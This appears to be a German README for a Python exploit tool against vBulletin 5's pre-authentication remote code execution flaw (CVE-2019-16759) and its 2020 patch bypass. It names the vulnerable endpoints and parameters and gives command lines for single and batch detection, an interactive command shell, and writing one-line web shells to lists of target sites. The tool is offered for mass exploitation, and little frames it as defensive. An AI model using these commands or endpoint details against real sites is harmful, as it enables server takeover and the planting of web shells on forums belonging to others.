
CVE-2019-16759 vbulletin 5.0.0 bis 5.5.4 Pre-Auth RCE
Im September 2019 wurde eine RCE-Schwachstelle (CVE-2019-16759) in vBulletin 5 (5.0.0-5.5.4) gemeldet. Durch die Nutzung der Datei ajax/render/widget_php und des POST-Parameters widgetConfig[code] konnte Remote Code Execution direkt ausgeführt werden.
Am 11. August 2020 wurde bekannt, dass der Patch für CVE-2019-16759 umgangen werden kann. Durch die Nutzung von ajax/render/widget_tabbedcontainer_tab_panel und des konstruierten POST-Parameters subWidgets[0][config][code] konnte Remote Code Execution direkt ausgeführt werden.
Dieses Tool unterstützt Einzel-URL-Erkennung, CmdShell, Web-Shell (Schreiben einer Einzeiler-Shell), Batch-Erkennung und Batch-GetShell.
python2.7
pip install requests
Verwendungshilfe: python vbulletin5-rce.py -h

Einzel-URL-Schwachstellenerkennung: python vbulletin5-rce.py -u "http://www.xxx.com/"


CmdShell: python vbulletin5-rce.py -u "http://www.xxx.com/" --cmdshell


Einzel-URL GetShell: python vbulletin5-rce.py -u "http://www.xxx.com/" --getshell


Batch-Erkennung: python vbulletin5-rce.py -f urls.txt

Batch-GetShell: python vbulletin5-rce.py -f urls.txt --getshell

Gmail: [email protected]